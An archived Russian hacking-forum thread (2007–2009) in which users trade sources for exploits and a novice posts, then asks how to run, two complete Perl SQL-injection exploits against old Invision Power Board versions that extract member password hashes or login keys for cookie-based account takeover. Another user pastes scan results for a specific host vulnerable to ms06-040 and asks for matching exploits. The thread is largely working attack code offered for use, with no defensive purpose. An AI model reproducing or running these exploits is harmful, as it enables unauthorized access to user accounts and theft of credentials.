Добро пожаловать! Это — архивная версия форумов на «Хакер.Ru». Она работает в режиме read-only.
 

Exploits

Пользователи, просматривающие топик: none

Зашли как: Guest
Все форумы >> [Программы для взлома] >> Exploits
Имя
Сообщение << Старые топики   Новые топики >>
Exploits - 2007-10-16 03:19:28.200000   
AlexSka

Сообщений: 31
Оценки: 0
Присоединился: 2007-10-16 02:45:22.613333
кто какие юзает сплойты и где можно достать их исходники ?

exploit ms0-411 - дает полный доступ к консоли на машине под управлением win2k XP
также пробовал использовать в ИЕ ActiveX для запуска разных приложений …
—————————–
кто что может посоветовать ?
Post #: 1
RE: Exploits - 2007-10-16 04:29:38.076666   
furiousangel

Сообщений: 1116
Оценки: 0
Присоединился: 2005-05-28 06:31:47
http://milw0rm.com/
securitylab.ru

обычно вначале сплоита в коментах пишут как его компилить…
Post #: 2
RE: Exploits - 2007-10-16 16:45:44.036666   
SkyLinE215

Сообщений: -986
Оценки: 0
Присоединился: 2007-08-27 10:25:44.570000
Здесь найдеш парочку.
Post #: 3
RE: Exploits - 2007-10-16 17:08:22.516666   
Pupkin-Zade

Сообщений: 9398
Оценки: 1489
Присоединился: 2004-03-10 13:54:16
Сюда попробуй
 
http://www.xakep.ru/articles/hack/bugtrack.asp?exploit=only
 
Post #: 4
RE: Exploits - 2007-10-16 21:29:50.866666   
multiexe

Сообщений: 532
Оценки: 0
Присоединился: 2007-09-18 18:00:33.783333
Здесь глянь http://www.milw0rm.com/
Post #: 5
RE: Exploits - 2007-10-22 17:09:41.623333   
ed_gein

Сообщений: 145
Оценки: 0
Присоединился: 2006-06-30 17:32:20
CoreImpact

Metasploit
Post #: 6
RE: Exploits - 2007-11-03 07:15:38.613333   
Belfigor

Сообщений: 80
Оценки: 0
Присоединился: 2007-05-07 03:37:58.466666
Юзаю два локальных сплоита 20070210-MS06-035(в паблике есть ) для ребута если открыт 445 порт , он почти у всех открыт , и  LSA EXPLOIT ( в паблике есть . но я не нашёл ( ) для полного доступа через смd  , особенно если открыт 1025 порт , хотя шелл порт 8357 , рульная вещь

Post #: 7
RE: Exploits - 2007-11-08 00:03:43.176666   
time2die

Сообщений: 222
Оценки: 0
Присоединился: 2007-03-16 12:14:09.526666
quote:

Юзаю два локальных сплоита 20070210-MS06-035 для ребута если открыт 445 порт

где ты такой эксплоит нарыл?где ваше нарыть эксплоит на те ошибки которые находит XSpider?я пытался искать на milWorm но там они все как-то странно называются,и я не нашел не одного кот мне нужен был=(
Post #: 8
RE: Exploits - 2007-11-08 00:24:11   
time2die

Сообщений: 222
Оценки: 0
Присоединился: 2007-03-16 12:14:09.526666
например я нарыл что комп 10.145.17.16
Вероятная версия операционной системы : Windows 5.1
Сервис
123 / udp Имя сервиса : Network Time Protocol
135 / tcp Не удалось идентифицировать RPC сервис
137 / udp Имя сервиса : NetBIOS (Network Basic Input/Output System) Session Service Protocol
139 / tcp Имя сервиса : Network Basic Input/Output System ( LanManager: Windows 2000 LAN Manager OS: Windows 5.1 )
445 / tcp Имя сервиса : Microsoft Directory Service ( Удаленное выполнение команд (ms06-040) )
1799 / tcp Имя сервиса устанавливаемого на этом порту по умолчанию : netrisk

в скоках типа ошибки,но я не могу найти эксплоиты к этим сервисам=(
Post #: 9
RE: Exploits - 2007-11-08 00:26:56.236666   
Mkey

Сообщений: 3426
Оценки: 0
Присоединился: 2006-03-08 14:32:13
metasploit.com
Post #: 10
RE: Exploits - 2007-11-08 16:06:40.086666   
time2die

Сообщений: 222
Оценки: 0
Присоединился: 2007-03-16 12:14:09.526666
quote:

metasploit.com

скинь ссылкы на метесплоите хоть на один из этих сервисов?если ты конечно за свои посты отвечаешь
Post #: 11
RE: Exploits - 2007-11-08 21:53:09.063333   
Mkey

Сообщений: 3426
Оценки: 0
Присоединился: 2006-03-08 14:32:13
quote:

скинь ссылкы на метесплоите хоть на один из этих сервисов?если ты конечно за свои посты отвечаешь

щас скрины сделаю для людей не желающих ваааще думать…
Post #: 12
RE: Exploits - 2007-11-08 22:12:22.040000   
Mkey

Сообщений: 3426
Оценки: 0
Присоединился: 2006-03-08 14:32:13
ВесЕлыЕкАртиНки… для людей не умеющих пользовать поиск….
Post #: 13
RE: Exploits - 2008-11-29 14:10:26.576666   
bobik23

Сообщений: 129
Оценки: 0
Присоединился: 2008-09-20 00:35:23.616666
вот хотел выложить один ,плз посмотрите почему он не запускается мож где в нем есть ошибка плс посмотрите что тут я не правильно делаю ,просто устал ждать  ,запускаю вот так c:\perl\bin\exploit.pl

#!/usr/bin/perl

use IO::Socket;

if (@ARGV < 4) { &usage; }

$server = $ARGV[0];
$path = $ARGV[1];
$member_id = $ARGV[2];
$target = $ARGV[3];

$pass = ($target)?('member_login_key'):('password');

$server =~ s!(http:\/\/)!!;

$request = 'http://';
$request .= $server;
$request .= $path;

$s_num = 1;
$|++;
$n = 0;

print "[~] SERVER : $server\r\n";
print "[~] PATH : $path\r\n";
print "[~] MEMBER ID : $member_id\r\n";
print "[~] TARGET : $target";
print (($target)?(' - IPB 2.*'):(' - IPB 1.*'));
print "\r\n";
print "[~] RICERCA PASSWORD … [|]";

($cmember_id = $member_id) =~ s/(.)/"%".uc(sprintf("%2.2x",ord($1)))/eg;

while(1)
{
if(&found(47,58)==0) { &found(96,122); }
$char = $i;
if ($char=="0")
{
if(length($allchar) > 0){
print qq{\b\b DONE ]

MEMBER ID : $member_id
};
print (($target)?('MEMBER_LOGIN_KEY : '):('PASSWORD : '));
print $allchar."\r\n";
}
else
{
print "\b\b Il sito e' protetto ]";
}
exit();
}
else
{
$allchar .= chr($i);
}
$s_num++;
}

sub found($$)
{
my $fmin = $_[0];
my $fmax = $_[1];
if (($fmax-$fmin)<5) { $i=crack($fmin,$fmax); return $i; }

$r = int($fmax - ($fmax-$fmin)/2);
$check = " BETWEEN $r AND $fmax";
if ( &check($check) ) { &found($r,$fmax); }
else { &found($fmin,$r); }
}

sub crack($$)
{
my $cmin = $_[0];
my $cmax = $_[1];
$i = $cmin;
while ($i<$cmax)
{
$crcheck = "=$i";
if ( &check($crcheck) ) { return $i; }
$i++;
}
$i = 0;
return $i;
}

sub check($)
{
$n++;
status();
$ccheck = $_[0];
$pass_hash1 = "%­36%­36%­36%2527%20%­4F%­52%20%28%­69%­64%3D";
$pass_hash2 = "%20%­41%­4E%­44%20%­61%­73%­63%­69%­69%28%­73%­75%­62%­73%­74%­72%­69%­6E%­67%28";
$pass_hash3 = $pass.",".$s_num.",1))".$ccheck.") /*";
$pass_hash3 =~ s/(.)/"%".uc(sprintf("%2.2x",ord($1)))/eg;
$nmalykh = "%26%231054%3B%26%231081%3B+%26%231088%3B%26%231072%3B%26%231073%3B%26%231086%3B%26%231090%3B%26%231072%3B%26%231077%3B%26%231090%3B%21";
$socket = IO::Socket::INET->new( Proto => "tcp", PeerAddr => "$server", PeerPort => "80");

printf $socket ("GET %­sindex.php?act=Login&CODE=autologin HTTP/1.0\nHost: %­s\nAccept: */*\nCookie: member_id=%­s; pass_hash=%­s%­s%­s%­s%­s\nConnection: close\n\n",
$path,$server,$cmember_id,$pass_hash1,$cmember_id,$pass_hash2,$pass_hash3,$nmalykh);

while(<$socket>)
{
if (/Set-Cookie: session_id=0;/) { return 1; }
}

return 0;
}

sub status()
{
$status = $n % 5;
if($status==0){ print "\b\b/]"; }
if($status==1){ print "\b\b-]"; }
if($status==2){ print "\b\b\\]"; }
if($status==3){ print "\b\b|]"; }
}

sub usage()
{
print q(
Invision Power Board v < 2.0.4 SQL injection exploit
—————————————————-
USO:
____________________________________________________________
exploit.pl [Host] [/cartellaIPB/] [utente] [IPBversion]

[server] - Host da Attaccare
[/folder/] - Cartella dove è installato IPB
[member_id] - Numero Utente da Attaccare

targets:
0 - per versioni 1.x
1 - per versioni 2.x (Inferiore alla 2.0.4)

Esempio exploit.pl http://example/index.php/forum/2.0

);
exit();
}
Post #: 14
RE: Exploits - 2008-11-29 22:55:22.320000   
bobik23

Сообщений: 129
Оценки: 0
Присоединился: 2008-09-20 00:35:23.616666
здесь кто -нить есть ,кому тут задавать вопросы можно?
подскожите кто-нить как запустить сплоит можно ,что в этих строках нужно прописывать.я их выделил красным

объясните кто может тут и другие после будут читать..

еще ,тут нужно за место 127.0.0.1 прописать адрес кого ломать ,или так остаётся все

#!/usr/bin/perl
use IO::Socket;

# # # #
# # # #
# # # #
# ## #### ## #
## ## ###### ## ##
## ## ###### ## ##
## ## #### ## ##
### ############ ###
########################
##############
######## ########## #######
### ## ########## ## ###
### ## ########## ## ###
### # ########## # ###
### ## ######## ## ###
## # ###### # ##
## # #### # ##
## ##

## Invision Power Board v2.0.0 - 2.0.2 sql injection exploit
## by RusH security team (www.rst.void.ru)
## coded by 1dt.w0lf
## ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
## example:
##
## r57ipb.pl 127.0.0.1 /IPB202/ 2 1 38e2a2752535f5b9a2636b1e22e7bee6
## ————————————————————————————————
## [&gt;] SERVER: 127.0.0.1
## [&gt;] DIR: /IPB202/
## [&gt;] FORUM: 2
## [&gt;] TOPIC: 1
## [&gt;] SID: 38e2a2752535f5b9a2636b1e22e7bee6
## [&gt;] PREFIX:
## [&gt;] ID:15956
## ————————————————————————————————
##
## [~] PREPARE TO CONNECT…
## [+] CONNECTED
## [~] SENDING QUERY…
## [+] DONE!
##
## PREFIX: ibf_
##
## r57ipb.pl 127.0.0.1 /IPB202/ 2 1 38e2a2752535f5b9a2636b1e22e7bee6 ibf_
## ————————————————————————————————
## [&gt;] SERVER:127.0.0.1
## [&gt;] DIR: /IPB202/
## [&gt;] FORUM: 2
## [&gt;] TOPIC: 1
## [&gt;] SID: 38e2a2752535f5b9a2636b1e22e7bee6
## [&gt;] PREFIX: ibf_
## [&gt;] ID:15956
## ————————————————————————————————
##
## [~] PREPARE TO CONNECT…
## [+] CONNECTED
## [~] SENDING QUERY…
## [+] DONE!
##
## –[ REPORT ]————————————————————————————
## MEMBER_ID: [1] NAME: [admin] PASS_HASH: [73dea61281aa9b08ed31b4ae2bb9954e]
## ————————————————————————————————
## Now you need edit cookie and insert new pass_hash and member_id values.
## ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
## Пару слов о возвращаемом эксплоитом результате:
## Значение pass_hash это не зашифрованный пароль юзера!!! а одноименное значение из кукиса с
## помощью которого можно войти на форум под любым юзером без ввода пароля.
## member_id это также одноименное значение из кукиса.
## Поэтому не стоит пытаться расшифровать pass_hash =) Просто зарегистрируйтесь на форуме и измените
## pass_hash и member_id в вашем cookie на одно из значений которые выдаст сплоит.
## ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~


if (@ARGV &lt; 5)
{
print "————————————————————————-\r\n";
print " Invision Power Board v2.0.0 - 2.0.2 sql injection exploit\r\n";
print "————————————————————————-\r\n";
print "usage:\r\n";
print "r57ipb.pl SERVER /DIR/ FORUM_NUM TOPIC_NUM SID [TABLE_PREFIX] [USER_ID]\r\n\r\n";
print "SERVER - server where IPB installed\r\n";
print "/DIR/ - IPB directory or / for no directory\r\n";
print "FORUM_NUM - number of existing forum\r\n";
print "TOPIC_NUM - number of existing topic\r\n";
print "SID - your session id\r\n";
print "[TABLE_PREFIX] - table prefix in database\r\n";
print "[USER_ID] - user id for exploiting\r\n\r\n";
print "e.g. r57ipb.pl 127.0.0.1 /IPB/ 2 1 38e2a2752535f5b9a2636b1e22e7bee6 ibf_\r\n";
print "————————————————————————-\r\n";
exit();
}

if (@ARGV &lt; 6) { $get_table = 1; }

$server = $ARGV[0];
$dir = $ARGV[1];
$fnum = $ARGV[2];
$tnum = $ARGV[3];
$sid = $ARGV[4];
$prefix = $ARGV[5];
$id = $ARGV[6];

print "————————————————————————————————\r\n";
print "[&gt;] SERVER: $server\r\n";
print "[&gt;] DIR: $dir\r\n";
print "[&gt;] FORUM: $fnum\r\n";
print "[&gt;] TOPIC: $tnum\r\n";
print "[&gt;] SID: $sid\r\n";
print "[&gt;] PREFIX: $prefix\r\n";
print "[&gt;] ID: $id\r\n";
print "————————————————————————————————\r\n\r\n";

$server =~ s/(http:\/\/)//eg;

$path = $dir;
$path .= "index.php?s=";
$path .= $sid;
$path .= "&act=Post&CODE=02&f=";
$path .= $fnum;
$path .= "&t=";
$path .= $tnum;
if ($get_table == 1)
{
$path .= "&qpid=r57"
}
else
{
$path .= "&qpid=666666666)%20union%20select%201,1,1,1,1,1,1,1,1,1,CONCAT(id,char(58),name,char(58),member_login_key),1,1,1,1,1,1,1,1,1%20from%20";
$path .= $prefix;
$path .= "members";
$path .= ($id)?("%20WHERE%20id=$id%20"):("%20");
$path .= "/*";
}
print "[~] PREPARE TO CONNECT…\r\n";

$socket = IO::Socket::INET-&gt;new( Proto =&gt; "tcp", PeerAddr =&gt; "$server", PeerPort =&gt; "80") || die "[-] CONNECTION FAILED";

print "[+] CONNECTED\r\n";
print "[~] SENDING QUERY…\r\n";
print $socket "GET $path HTTP/1.1\r\n";
print $socket "Host: $server\r\n";
print $socket "Accept: */*\r\n";
print $socket "Connection: close\r\n\r\n";
print "[+] DONE!\r\n\r\n";

$suc =0;

if ($get_table == 1)
{
while ($answer = &lt;$socket&gt;)
{
if ($answer =~ /(mySQL query error: )(.*)( FROM )(.*)(posts)/){ print "PREFIX: $4\r\n"; $suc = 1; }
}
if (!$suc) { print "Exploit failed\r\n"; }
exit();
}

print "–[ REPORT ]————————————————————————————\r\n";
while ($answer = &lt;$socket&gt;)
{
if ($answer =~ /^([^:]*):([^:]*):([a-z,0-9]{32})$/) { print "MEMBER_ID: [$1] NAME: [$2] PASS_HASH: [$3]\r\n"; $suc = 1; }
}
print "————————————————————————————————\r\n";
if ($suc == 1) { print "Now you need edit cookie and insert new pass_hash and member_id values.\r\n"; exit(); }
else { print "Exploit failed\r\n"; }



# milw0rm.com [2004-11-22]

Post #: 15
RE: Exploits - 2008-12-25 03:15:48.166666   
bobik23

Сообщений: 129
Оценки: 0
Присоединился: 2008-09-20 00:35:23.616666
значет отвечу сам как думаю ,запускать нужно так c:\Perl\bin\r57ipb.pl 127.0.0.1 /IPB202/ 2 1 38e2a2752535f5b9a2636b1e22e7bee6 ibf,так новерно будет верней ,ну конечно я увидел разницу  в запуске между вистой и xp.
сплоит для версси v2.0.0 - 2.0.2 ::::: где&nbsp; c:\Perl\bin\-это путь к папкам где лежит сплоит&nbsp;&nbsp;&nbsp; ::::: &nbsp;&nbsp;&nbsp; r57ipb.pl-сам файл(название файла) :::::&nbsp; /IPB202/-Директория(IPB directory or / for no directory)&nbsp; :::::::: 2-forum&nbsp; 1-Topik&nbsp; :::::: 38e2a2752535f5b9a2636b1e22e7bee6 ibf&nbsp; -тут наши куки
запуск производил на висте …


2)
ну и хотел сразу зaдать пару вопросов .я так понял эта строка и делает injection могу -ли сам вписать свою произвольную команду injection в сплоите(тойсть переделать вставить свое)
$path .= "&amp;qpid=666666666)%20union%20select%201,1,1,1,1,1,1,1,1,1,CONCAT(id,char(58),name,char(58),member_login_key),1,1,1,1,1,1,1,1,1%20from%20";

&nbsp;

Post #: 16
RE: Exploits - 2009-01-06 04:52:32.973333   
bobik23

Сообщений: 129
Оценки: 0
Присоединился: 2008-09-20 00:35:23.616666
">
подскажите плз где найти можно декодер и енкодер для перла ,чтоб такие вещи делать =~ s/(.)/"%".uc(sprintf("%2.2x",ord($1)))/eg;
Encoding and Decoding URLs via perl (including decimal to hex conversion)

описание:
http://glennf.com/writing/hexadecimal.url.encoding.html

Post #: 17
RE: Exploits - 2009-10-21 12:53:26.686666   
Tester_Egor4ik

Сообщений: 161
Оценки: 0
Присоединился: 2009-10-15 15:45:32.776666
к своему стыду не один сплойт у меня не сделал своего дела(которые я сам собирал)
Post #: 18
Страниц:  [1]
Все форумы >> [Программы для взлома] >> Exploits







Связаться:
Вопросы по сайту / xakep@glc.ru

Предупреждение: использование полученных знаний в противозаконных целях преследуется по закону.